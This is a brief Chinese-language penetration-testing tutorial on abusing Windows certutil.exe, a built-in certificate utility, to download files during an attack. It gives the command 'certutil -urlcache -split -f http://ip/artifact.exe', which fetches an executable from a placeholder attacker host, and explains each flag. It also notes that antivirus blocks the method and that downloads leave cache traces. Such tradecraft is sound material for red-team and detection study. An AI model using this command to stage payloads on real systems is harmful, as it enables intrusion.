渗透中Windows利用Certutil进行文件下载
1.概述
certutil.exe 是一个合法Windows文件,用于管理Windows证书的程序。此合法Windows服务现已被广泛滥用于恶意用途
渗透中主要利用其下载、编码、解码、替代数据流等功能
可以在命令行用certutil -?查看一下certutil所有的参数:
2.利用Certutil进行文件下载
一般最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。但是因为在下载文件的过程中也会创建进程,所以也遭到了各大杀软的拦截
certutil -urlcache -split -f http://ip/artifact.exe
参数介绍:
- -f 覆盖现有文件。有值的命令行选项。后面跟要下载的文件 url
- -split 保存到文件。无值的命令行选项。加了的话就可以下载到当前路径,不加就下载到了默认路径
- -URLCache 显示或删除URL缓存条目。无值的命令行选项(certutil.exe 下载有个弊端,它的每一次下载都有留有缓存)
